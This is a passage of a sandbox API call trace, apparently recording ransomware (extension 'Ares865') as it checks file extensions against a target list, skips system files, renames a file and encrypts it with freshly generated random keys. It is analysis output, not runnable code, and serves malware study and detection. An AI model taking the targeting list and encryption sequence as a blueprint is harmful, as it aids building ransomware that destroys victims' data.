lpString2="sqlitedb") returned -1 [0088.779] lstrlenW (lpString="xml") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="xml") returned -1 [0088.779] lstrlenW (lpString="$er") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="$er") returned 1 [0088.779] lstrlenW (lpString="4dd") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="4dd") returned 1 [0088.779] lstrlenW (lpString="4dl") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="4dl") returned 1 [0088.779] lstrlenW (lpString="^^^") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="^^^") returned 1 [0088.779] lstrlenW (lpString="abs") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="abs") returned 1 [0088.779] lstrlenW (lpString="abx") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="abx") returned 1 [0088.779] lstrlenW (lpString="accdb") returned 5 [0088.779] lstrcmpiW (lpString1="0.dat", lpString2="accdb") returned -1 [0088.779] lstrlenW (lpString="accdc") returned 5 [0088.779] lstrcmpiW (lpString1="0.dat", lpString2="accdc") returned -1 [0088.779] lstrlenW (lpString="accde") returned 5 [0088.779] lstrcmpiW (lpString1="0.dat", lpString2="accde") returned -1 [0088.779] lstrlenW (lpString="accdr") returned 5 [0088.779] lstrcmpiW (lpString1="0.dat", lpString2="accdr") returned -1 [0088.779] lstrlenW (lpString="accdt") returned 5 [0088.779] lstrcmpiW (lpString1="0.dat", lpString2="accdt") returned -1 [0088.779] lstrlenW (lpString="accdw") returned 5 [0088.779] lstrcmpiW (lpString1="0.dat", lpString2="accdw") returned -1 [0088.779] lstrlenW (lpString="accft") returned 5 [0088.779] lstrcmpiW (lpString1="0.dat", lpString2="accft") returned -1 [0088.779] lstrlenW (lpString="adb") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0088.779] lstrlenW (lpString="adb") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="adb") returned 1 [0088.779] lstrlenW (lpString="ade") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="ade") returned 1 [0088.779] lstrlenW (lpString="adf") returned 3 [0088.779] lstrcmpiW (lpString1="dat", lpString2="adf") returned 1 [0088.779] lstrlenW (lpString="adn") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="adn") returned 1 [0088.780] lstrlenW (lpString="adp") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="adp") returned 1 [0088.780] lstrlenW (lpString="alf") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="alf") returned 1 [0088.780] lstrlenW (lpString="ask") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="ask") returned 1 [0088.780] lstrlenW (lpString="btr") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="btr") returned 1 [0088.780] lstrlenW (lpString="cat") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="cat") returned 1 [0088.780] lstrlenW (lpString="cdb") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="cdb") returned 1 [0088.780] lstrlenW (lpString="ckp") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="ckp") returned 1 [0088.780] lstrlenW (lpString="cma") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="cma") returned 1 [0088.780] lstrlenW (lpString="cpd") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="cpd") returned 1 [0088.780] lstrlenW (lpString="dacpac") returned 6 [0088.780] lstrcmpiW (lpString1="r0.dat", lpString2="dacpac") returned 1 [0088.780] lstrlenW (lpString="dad") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="dad") returned 1 [0088.780] lstrlenW (lpString="dadiagrams") returned 10 [0088.780] lstrlenW (lpString="daschema") returned 8 [0088.780] lstrcmpiW (lpString1="mgr0.dat", lpString2="daschema") returned 1 [0088.780] lstrlenW (lpString="db-journal") returned 10 [0088.780] lstrlenW (lpString="db-shm") returned 6 [0088.780] lstrcmpiW (lpString1="r0.dat", lpString2="db-shm") returned 1 [0088.780] lstrlenW (lpString="db-wal") returned 6 [0088.780] lstrcmpiW (lpString1="r0.dat", lpString2="db-wal") returned 1 [0088.780] lstrlenW (lpString="dbc") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="dbc") returned -1 [0088.780] lstrlenW (lpString="dbs") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="dbs") returned -1 [0088.780] lstrlenW (lpString="dbt") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="dbt") returned -1 [0088.780] lstrlenW (lpString="dbv") returned 3 [0088.780] lstrcmpiW (lpString1="dat", lpString2="dbv") returned -1 [0088.780] lstrlenW (lpString="dbx") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dbx") returned -1 [0088.781] lstrlenW (lpString="dcb") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dcb") returned -1 [0088.781] lstrlenW (lpString="dct") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dct") returned -1 [0088.781] lstrlenW (lpString="dcx") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dcx") returned -1 [0088.781] lstrlenW (lpString="ddl") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="ddl") returned -1 [0088.781] lstrlenW (lpString="dlis") returned 4 [0088.781] lstrcmpiW (lpString1=".dat", lpString2="dlis") returned -1 [0088.781] lstrlenW (lpString="dp1") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dp1") returned -1 [0088.781] lstrlenW (lpString="dqy") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dqy") returned -1 [0088.781] lstrlenW (lpString="dsk") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dsk") returned -1 [0088.781] lstrlenW (lpString="dsn") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dsn") returned -1 [0088.781] lstrlenW (lpString="dtsx") returned 4 [0088.781] lstrcmpiW (lpString1=".dat", lpString2="dtsx") returned -1 [0088.781] lstrlenW (lpString="dxl") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="dxl") returned -1 [0088.781] lstrlenW (lpString="eco") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="eco") returned -1 [0088.781] lstrlenW (lpString="ecx") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="ecx") returned -1 [0088.781] lstrlenW (lpString="edb") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="edb") returned -1 [0088.781] lstrlenW (lpString="epim") returned 4 [0088.781] lstrcmpiW (lpString1=".dat", lpString2="epim") returned -1 [0088.781] lstrlenW (lpString="fcd") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="fcd") returned -1 [0088.781] lstrlenW (lpString="fdb") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="fdb") returned -1 [0088.781] lstrlenW (lpString="fic") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="fic") returned -1 [0088.781] lstrlenW (lpString="flexolibrary") returned 12 [0088.781] lstrlenW (lpString="fm5") returned 3 [0088.781] lstrcmpiW (lpString1="dat", lpString2="fm5") returned -1 [0088.782] lstrlenW (lpString="fmp") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="fmp") returned -1 [0088.782] lstrlenW (lpString="fmp12") returned 5 [0088.782] lstrcmpiW (lpString1="0.dat", lpString2="fmp12") returned -1 [0088.782] lstrlenW (lpString="fmpsl") returned 5 [0088.782] lstrcmpiW (lpString1="0.dat", lpString2="fmpsl") returned -1 [0088.782] lstrlenW (lpString="fol") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="fol") returned -1 [0088.782] lstrlenW (lpString="fp3") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="fp3") returned -1 [0088.782] lstrlenW (lpString="fp4") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="fp4") returned -1 [0088.782] lstrlenW (lpString="fp5") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="fp5") returned -1 [0088.782] lstrlenW (lpString="fp7") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="fp7") returned -1 [0088.782] lstrlenW (lpString="fpt") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="fpt") returned -1 [0088.782] lstrlenW (lpString="frm") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="frm") returned -1 [0088.782] lstrlenW (lpString="gdb") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="gdb") returned -1 [0088.782] lstrlenW (lpString="gdb") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="gdb") returned -1 [0088.782] lstrlenW (lpString="grdb") returned 4 [0088.782] lstrcmpiW (lpString1=".dat", lpString2="grdb") returned -1 [0088.782] lstrlenW (lpString="gwi") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="gwi") returned -1 [0088.782] lstrlenW (lpString="hdb") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="hdb") returned -1 [0088.782] lstrlenW (lpString="his") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="his") returned -1 [0088.782] lstrlenW (lpString="ib") returned 2 [0088.782] lstrcmpiW (lpString1="at", lpString2="ib") returned -1 [0088.782] lstrlenW (lpString="idb") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="idb") returned -1 [0088.782] lstrlenW (lpString="ihx") returned 3 [0088.782] lstrcmpiW (lpString1="dat", lpString2="ihx") returned -1 [0088.782] lstrlenW (lpString="itdb") returned 4 [0088.783] lstrcmpiW (lpString1=".dat", lpString2="itdb") returned -1 [0088.783] lstrlenW (lpString="itw") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="itw") returned -1 [0088.783] lstrlenW (lpString="jet") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="jet") returned -1 [0088.783] lstrlenW (lpString="jtx") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="jtx") returned -1 [0088.783] lstrlenW (lpString="kdb") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="kdb") returned -1 [0088.783] lstrlenW (lpString="kexi") returned 4 [0088.783] lstrcmpiW (lpString1=".dat", lpString2="kexi") returned -1 [0088.783] lstrlenW (lpString="kexic") returned 5 [0088.783] lstrcmpiW (lpString1="0.dat", lpString2="kexic") returned -1 [0088.783] lstrlenW (lpString="kexis") returned 5 [0088.783] lstrcmpiW (lpString1="0.dat", lpString2="kexis") returned -1 [0088.783] lstrlenW (lpString="lgc") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="lgc") returned -1 [0088.783] lstrlenW (lpString="lwx") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="lwx") returned -1 [0088.783] lstrlenW (lpString="maf") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="maf") returned -1 [0088.783] lstrlenW (lpString="maq") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="maq") returned -1 [0088.783] lstrlenW (lpString="mar") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="mar") returned -1 [0088.783] lstrlenW (lpString="marshal") returned 7 [0088.783] lstrcmpiW (lpString1="gr0.dat", lpString2="marshal") returned -1 [0088.783] lstrlenW (lpString="mas") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="mas") returned -1 [0088.783] lstrlenW (lpString="mav") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="mav") returned -1 [0088.783] lstrlenW (lpString="maw") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="maw") returned -1 [0088.783] lstrlenW (lpString="mdbhtml") returned 7 [0088.783] lstrcmpiW (lpString1="gr0.dat", lpString2="mdbhtml") returned -1 [0088.783] lstrlenW (lpString="mdn") returned 3 [0088.783] lstrcmpiW (lpString1="dat", lpString2="mdn") returned -1 [0088.783] lstrlenW (lpString="mdt") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="mdt") returned -1 [0088.784] lstrlenW (lpString="mfd") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="mfd") returned -1 [0088.784] lstrlenW (lpString="mpd") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="mpd") returned -1 [0088.784] lstrlenW (lpString="mrg") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="mrg") returned -1 [0088.784] lstrlenW (lpString="mud") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="mud") returned -1 [0088.784] lstrlenW (lpString="mwb") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="mwb") returned -1 [0088.784] lstrlenW (lpString="myd") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="myd") returned -1 [0088.784] lstrlenW (lpString="ndf") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="ndf") returned -1 [0088.784] lstrlenW (lpString="nnt") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="nnt") returned -1 [0088.784] lstrlenW (lpString="nrmlib") returned 6 [0088.784] lstrcmpiW (lpString1="r0.dat", lpString2="nrmlib") returned 1 [0088.784] lstrlenW (lpString="ns2") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="ns2") returned -1 [0088.784] lstrlenW (lpString="ns3") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="ns3") returned -1 [0088.784] lstrlenW (lpString="ns4") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="ns4") returned -1 [0088.784] lstrlenW (lpString="nsf") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="nsf") returned -1 [0088.784] lstrlenW (lpString="nv") returned 2 [0088.784] lstrcmpiW (lpString1="at", lpString2="nv") returned -1 [0088.784] lstrlenW (lpString="nv2") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="nv2") returned -1 [0088.784] lstrlenW (lpString="nwdb") returned 4 [0088.784] lstrcmpiW (lpString1=".dat", lpString2="nwdb") returned -1 [0088.784] lstrlenW (lpString="nyf") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="nyf") returned -1 [0088.784] lstrlenW (lpString="odb") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="odb") returned -1 [0088.784] lstrlenW (lpString="odb") returned 3 [0088.784] lstrcmpiW (lpString1="dat", lpString2="odb") returned -1 [0088.784] lstrlenW (lpString="oqy") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="oqy") returned -1 [0088.785] lstrlenW (lpString="ora") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="ora") returned -1 [0088.785] lstrlenW (lpString="orx") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="orx") returned -1 [0088.785] lstrlenW (lpString="owc") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="owc") returned -1 [0088.785] lstrlenW (lpString="p96") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="p96") returned -1 [0088.785] lstrlenW (lpString="p97") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="p97") returned -1 [0088.785] lstrlenW (lpString="pan") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="pan") returned -1 [0088.785] lstrlenW (lpString="pdb") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="pdb") returned -1 [0088.785] lstrlenW (lpString="pdm") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="pdm") returned -1 [0088.785] lstrlenW (lpString="pnz") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="pnz") returned -1 [0088.785] lstrlenW (lpString="qry") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="qry") returned -1 [0088.785] lstrlenW (lpString="qvd") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="qvd") returned -1 [0088.785] lstrlenW (lpString="rbf") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="rbf") returned -1 [0088.785] lstrlenW (lpString="rctd") returned 4 [0088.785] lstrcmpiW (lpString1=".dat", lpString2="rctd") returned -1 [0088.785] lstrlenW (lpString="rod") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="rod") returned -1 [0088.785] lstrlenW (lpString="rodx") returned 4 [0088.785] lstrcmpiW (lpString1=".dat", lpString2="rodx") returned -1 [0088.785] lstrlenW (lpString="rpd") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="rpd") returned -1 [0088.785] lstrlenW (lpString="rsd") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="rsd") returned -1 [0088.785] lstrlenW (lpString="sas7bdat") returned 8 [0088.785] lstrcmpiW (lpString1="mgr0.dat", lpString2="sas7bdat") returned -1 [0088.785] lstrlenW (lpString="sbf") returned 3 [0088.785] lstrcmpiW (lpString1="dat", lpString2="sbf") returned -1 [0088.786] lstrlenW (lpString="scx") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="scx") returned -1 [0088.786] lstrlenW (lpString="sdb") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="sdb") returned -1 [0088.786] lstrlenW (lpString="sdc") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="sdc") returned -1 [0088.786] lstrlenW (lpString="sdf") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="sdf") returned -1 [0088.786] lstrlenW (lpString="sis") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="sis") returned -1 [0088.786] lstrlenW (lpString="spq") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="spq") returned -1 [0088.786] lstrlenW (lpString="te") returned 2 [0088.786] lstrcmpiW (lpString1="at", lpString2="te") returned -1 [0088.786] lstrlenW (lpString="teacher") returned 7 [0088.786] lstrcmpiW (lpString1="gr0.dat", lpString2="teacher") returned -1 [0088.786] lstrlenW (lpString="tmd") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="tmd") returned -1 [0088.786] lstrlenW (lpString="tps") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="tps") returned -1 [0088.786] lstrlenW (lpString="trc") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="trc") returned -1 [0088.786] lstrlenW (lpString="trc") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="trc") returned -1 [0088.786] lstrlenW (lpString="trm") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="trm") returned -1 [0088.786] lstrlenW (lpString="udb") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="udb") returned -1 [0088.786] lstrlenW (lpString="udl") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="udl") returned -1 [0088.786] lstrlenW (lpString="usr") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="usr") returned -1 [0088.786] lstrlenW (lpString="v12") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="v12") returned -1 [0088.786] lstrlenW (lpString="vis") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="vis") returned -1 [0088.786] lstrlenW (lpString="vpd") returned 3 [0088.786] lstrcmpiW (lpString1="dat", lpString2="vpd") returned -1 [0088.786] lstrlenW (lpString="vvv") returned 3 [0088.787] lstrcmpiW (lpString1="dat", lpString2="vvv") returned -1 [0088.787] lstrlenW (lpString="wdb") returned 3 [0088.787] lstrcmpiW (lpString1="dat", lpString2="wdb") returned -1 [0088.787] lstrlenW (lpString="wmdb") returned 4 [0088.787] lstrcmpiW (lpString1=".dat", lpString2="wmdb") returned -1 [0088.787] lstrlenW (lpString="wrk") returned 3 [0088.787] lstrcmpiW (lpString1="dat", lpString2="wrk") returned -1 [0088.787] lstrlenW (lpString="xdb") returned 3 [0088.787] lstrcmpiW (lpString1="dat", lpString2="xdb") returned -1 [0088.787] lstrlenW (lpString="xld") returned 3 [0088.787] lstrcmpiW (lpString1="dat", lpString2="xld") returned -1 [0088.787] lstrlenW (lpString="xmlff") returned 5 [0088.787] lstrcmpiW (lpString1="0.dat", lpString2="xmlff") returned -1 [0088.787] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.Ares865") returned 65 [0088.787] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat.ares865"), dwFlags=0x1) returned 1 [0088.788] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat.Ares865" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.788] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4194304) returned 1 [0088.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.788] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.789] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.789] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.789] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x400300, lpName=0x0) returned 0x15c [0088.791] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x300) returned 0x190000 [0088.791] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3030000 [0088.902] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.903] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.903] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.903] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.903] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.903] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.903] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.903] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.903] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0088.903] CloseHandle (hObject=0x15c) returned 1 [0088.903] CloseHandle (hObject=0x118) returned 1 [0088.904] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.904] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.904] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.912] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0088.912] lstrcmpiW (lpString1="qmgr1.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.912] lstrcmpiW (lpString1="qmgr1.dat", lpString2="aoldtz.exe") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2=".") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="..") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="windows") returned -1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="bootmgr") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="temp") returned -1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="pagefile.sys") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="boot") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="ids.txt") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="ntuser.dat") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="perflogs") returned 1 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2="MSBuild") returned 1 [0088.913] lstrlenW (lpString="qmgr1.dat") returned 9 [0088.913] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 57 [0088.913] lstrcpyW (in: lpString1=0x2cce460, lpString2="qmgr1.dat" | out: lpString1="qmgr1.dat") returned="qmgr1.dat" [0088.913] lstrlenW (lpString="qmgr1.dat") returned 9 [0088.913] lstrlenW (lpString="Ares865") returned 7 [0088.913] lstrcmpiW (lpString1="gr1.dat", lpString2="Ares865") returned 1 [0088.913] lstrlenW (lpString=".dll") returned 4 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2=".dll") returned 1 [0088.913] lstrlenW (lpString=".lnk") returned 4 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2=".lnk") returned 1 [0088.913] lstrlenW (lpString=".ini") returned 4 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2=".ini") returned 1 [0088.913] lstrlenW (lpString=".sys") returned 4 [0088.913] lstrcmpiW (lpString1="qmgr1.dat", lpString2=".sys") returned 1 [0088.913] lstrlenW (lpString="qmgr1.dat") returned 9 [0088.913] lstrlenW (lpString="bak") returned 3 [0088.913] lstrcmpiW (lpString1="dat", lpString2="bak") returned 1 [0088.913] lstrlenW (lpString="ba_") returned 3 [0088.913] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0088.913] lstrlenW (lpString="dbb") returned 3 [0088.913] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0088.913] lstrlenW (lpString="vmdk") returned 4 [0088.913] lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0088.913] lstrlenW (lpString="rar") returned 3 [0088.913] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0088.913] lstrlenW (lpString="zip") returned 3 [0088.913] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0088.913] lstrlenW (lpString="tgz") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0088.914] lstrlenW (lpString="vbox") returned 4 [0088.914] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0088.914] lstrlenW (lpString="vdi") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0088.914] lstrlenW (lpString="vhd") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0088.914] lstrlenW (lpString="vhdx") returned 4 [0088.914] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0088.914] lstrlenW (lpString="avhd") returned 4 [0088.914] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0088.914] lstrlenW (lpString="db") returned 2 [0088.914] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0088.914] lstrlenW (lpString="db2") returned 3 [0088.914] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0088.914] 